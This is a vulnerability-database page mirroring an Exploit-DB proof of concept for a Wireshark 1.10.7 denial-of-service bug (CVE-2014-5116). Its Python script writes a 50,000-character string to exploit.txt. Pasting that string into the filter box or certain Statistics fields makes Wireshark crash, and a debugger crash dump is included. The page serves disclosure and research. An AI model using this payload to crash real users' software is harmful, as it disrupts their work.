Lucene search
+L

Wireshark 1.10.7 - Denial of Service (PoC)

🗓️ 16 May 2014 00:00:00Reported by Osanda Malith JayathissaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 20 Views

Wireshark 1.10.7 - Denial of Service (PoC) for Window

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2014-5116
16 May 201400:00
circl
CVE
CVE-2014-5116
29 Jul 201414:00
cve
Cvelist
CVE-2014-5116
29 Jul 201414:00
cvelist
EUVD
EUVD-2014-5014
7 Oct 202500:30
euvd
NVD
CVE-2014-5116
29 Jul 201414:55
nvd
OSV
UBUNTU-CVE-2014-5116
29 Jul 201414:55
osv
Prion
Null pointer dereference
29 Jul 201414:55
prion
Positive Technologies
PT-2014-6293 · Cairo +1 · Cairo +1
29 Jul 201400:00
ptsecurity
Positive Technologies
PT-2016-2277 · Cairo +2 · Cairo +2
20 Oct 201400:00
ptsecurity
Positive Technologies
PT-2017-17759 · Cairo +3 · Cairo +3
20 Oct 201400:00
ptsecurity
Rows per page
#!/usr/bin/python
# Exploit Title: Wireshark Read Access Violation near NULL starting at libcairo_2!cairo_image_surface_get_data()
# Date: May 15th 2014
# Author: Osanda Malith Jayathissa
# E-Mail: osandajayathissa<[at]>gmail.com
# Version: 1.10.7 32-bit and 64-bit
# Vendor Homepage: http://www.wireshark.org
# Tested on: Windows 8 64-bit
'''
The issue is with the cairo_image_surface_get_data() function in Cairo.
These fields are vulnerable:
- Filter text box
- Statistics -> IP DESTINATIONS
- Statistics -> IP Addresses
Paste the generated text in any one of above fields and hit return.
'''

payload = "A" * 50000
file = open('exploit.txt', "w")
file.write(payload)
file.close()

'''
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Wireshark32\libcairo-2.dll -
eax=00000000 ebx=052dabf0 ecx=77bc2ad2 edx=612fc6e0 esi=00000000 edi=612fc6e0
eip=61291737 esp=008cdca0 ebp=00000000 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
libcairo_2!cairo_image_surface_get_data+0x7:
61291737 8138609d2f61    cmp     dword ptr [eax],offset libcairo_2!cairo_tee_surface_index+0xd080 (612f9d60) ds:002b:00000000=????????
'''

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 May 2014 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25
EPSS0.07784
20